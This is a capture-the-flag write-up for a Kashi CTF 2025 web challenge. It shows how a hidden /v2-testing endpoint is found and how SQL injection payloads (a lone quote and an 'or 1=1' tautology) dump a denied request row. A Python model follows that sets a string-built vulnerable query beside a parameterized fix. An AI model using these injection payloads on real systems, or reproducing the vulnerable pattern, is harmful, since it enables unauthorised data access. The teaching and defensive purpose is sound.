Kashi Corpo1

This is the writeup for the Corporate Life 1 web challenge of Kashi CTF 2025.

Description

The Request Management App is used to view all pending requests for each user. It’s a pretty basic website, though I heard they were working on something new.

Anyway, did you know that one of the disgruntled employees shared some company secrets on the Requests Management App, but its status was set to denied before I could see it. Please find out what it was and spill the tea!

Notes

Writeup

The page's Next.js build manifest in the source reveals an unlinked /v2-testing endpoint:

},"/":["static/chunks/pages/index-6413244cd5618b98.js"],
"/_error":["static/chunks/pages/_error-fde50cb7f1ab27e0.js"],
"/v2-testing":["static/chunks/pages/v2-testing-fb612b495bb99203.js"],
sortedPages:["/","/_app","/_error","/v2-testing"]
}

http://34.41.106.173:10742/v2-testing

Sending a single quote in the filter field suggests the endpoint is vulnerable to SQL injection:

{
"filter":"'"
}

This results in the following error message:

{
"error":"Internal Server Error: Database communication failed"
}

The simple SQLi payload:

{"filter":"' or '1'='1' -- -"}

This dumps every row in the requests table, including the denied request that holds the flag:

{
  "employee_name": "peter.johnson",
  "request_detail": "Shitty job, I hate working here, I will leak all important information like KashiCTF{REDACTED_FLAG}",
  "status": "denied",
  "department": "Logistics",
  "role": "Supply Chain Manager",
  "email": "peter.johnson@corp.com"
}
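To show why the filter behaves this way and how the endpoint should have been written, here is an added example that is not the challenge's own code (the real app is Next.js; this model uses Python and an in-memory SQLite database so it runs offline). The table layout, the column names beyond those visible in the dump, and the exact shape of the WHERE clause are assumptions; the two payloads and the error string are the ones from the writeup. The vulnerable handler pastes the JSON filter value into the query string, which is why a lone quote produces a database error and the tautology drops the status restriction; the parameterized handler treats the same input as a literal LIKE pattern. A final helper checks the invariant the app was supposed to enforce: no non-pending row ever reaches the caller.

```python
"""Model of the /v2-testing filter endpoint: string-built SQL versus a
parameterized query. Added illustration, not code from the challenge."""
import sqlite3

# Constructed sample rows mirroring the fields visible in the writeup's dump.
SAMPLE_ROWS = [
    ("alice.smith", "Need a replacement laptop", "pending",
     "IT", "Analyst", "alice.smith@corp.com"),
    ("bob.lee", "Travel reimbursement", "pending",
     "Sales", "Account Rep", "bob.lee@corp.com"),
    ("peter.johnson", "I will leak all important information like KashiCTF{REDACTED_FLAG}",
     "denied", "Logistics", "Supply Chain Manager", "peter.johnson@corp.com"),
]

ERROR_RESPONSE = {"error": "Internal Server Error: Database communication failed"}


def make_db():
    """In-memory SQLite database seeded with the constructed rows (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.row_factory = sqlite3.Row
    conn.execute(
        "CREATE TABLE requests ("
        "employee_name TEXT, request_detail TEXT, status TEXT, "
        "department TEXT, role TEXT, email TEXT)"
    )
    conn.executemany("INSERT INTO requests VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_filter(conn, flt):
    """Assumed shape of the broken endpoint: the 'filter' value is concatenated
    into the WHERE clause, so a quote ends the string literal early."""
    sql = (
        "SELECT employee_name, request_detail, status, department, role, email "
        "FROM requests WHERE status = 'pending' "
        f"AND employee_name LIKE '%{flt}%'"
    )
    try:
        return {"rows": [dict(r) for r in conn.execute(sql)]}
    except sqlite3.Error:
        # The app hides the driver error behind a generic message.
        return dict(ERROR_RESPONSE)


def safe_filter(conn, flt):
    """Hardened version: the pattern is bound as a parameter, so the input can
    never change the query structure; the status restriction always applies."""
    sql = (
        "SELECT employee_name, request_detail, status, department, role, email "
        "FROM requests WHERE status = 'pending' AND employee_name LIKE ?"
    )
    return {"rows": [dict(r) for r in conn.execute(sql, (f"%{flt}%",))]}


def leaked_statuses(response):
    """Statuses other than 'pending' present in a response; the set should be
    empty for every request the endpoint answers."""
    return {r["status"] for r in response.get("rows", []) if r["status"] != "pending"}


if __name__ == "__main__":
    db = make_db()
    for payload in ["'", "' or '1'='1' -- -", "alice"]:
        print(repr(payload), "vulnerable ->", vulnerable_filter(db, payload))
        print(repr(payload), "safe       ->", safe_filter(db, payload))
```

Run as a script it prints, for each payload, what the string-built handler returns next to what the parameterized one returns: the quote alone yields the generic database error, the tautology returns all three rows (including the denied one) from the vulnerable handler and nothing from the safe one, and a plain name matches in both.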